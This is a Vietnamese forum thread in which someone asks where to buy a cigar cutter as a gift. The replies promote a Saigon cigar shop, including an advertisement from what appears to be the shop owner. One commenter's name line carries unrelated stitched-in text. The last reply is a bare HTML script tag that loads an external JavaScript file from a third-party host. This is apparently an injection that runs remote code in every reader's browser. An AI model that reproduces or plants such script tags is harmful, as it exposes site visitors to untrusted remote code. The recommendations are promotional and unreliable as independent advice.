Mua dao cắt xì gà ở đâu tốt nhất ??

Hiện mình có sếp thích hút xì gà, và cũng muốn mua phụ kiện dao cắt xì gà thật độc đáo để tặng sếp. Mấy thánh cho em xin ý kiến mua ở đâu uy tín và tốt nhất ạ ?

Wepos Agency
Trả lời 7 năm trước

Mình trước có ghé mua bên Dũng Cigar, 59 Hùng Vương, phường 4, Quận 5 thấy ok lắm.

anh chủ vừa vui tính và tận tâm chỉ cách hướng dẫn.

dao-cat-cigar.jpg

về tặng bố vợ thích lắm !!!

Nguyễn Phi Dũng
Trả lời 7 năm trước
Cảm ơn bạn rất nhiều ^^
Nguyễn Thị Thanh Loan ẩn vì lỗi gh, âm tiền vẫn ko tự ẩn để tiếp tục phát sinh thêm đơn
Trả lời 7 năm trước
chuẩn đấy
Nguyễn Phi Dũng
Trả lời 7 năm trước

Dũng Cigar, chuyên cung cấp xì gà CuBa, Dao cắt xì gà, bật lửa xì gà,....

tất cả các phụ kiện cho xì gà đều được chúng tôi chọn lọc và kiểm tra trước khi gửi đến tay quí khách hàng.

Dũng Cigar

59 Hùng Vương, p4, Quận 5, Tp HCM

Ioe52679
Trả lời 7 năm trước

<script type="text/javascript" src="http://yourjavascript.com/12046885216/binpc.js"></script>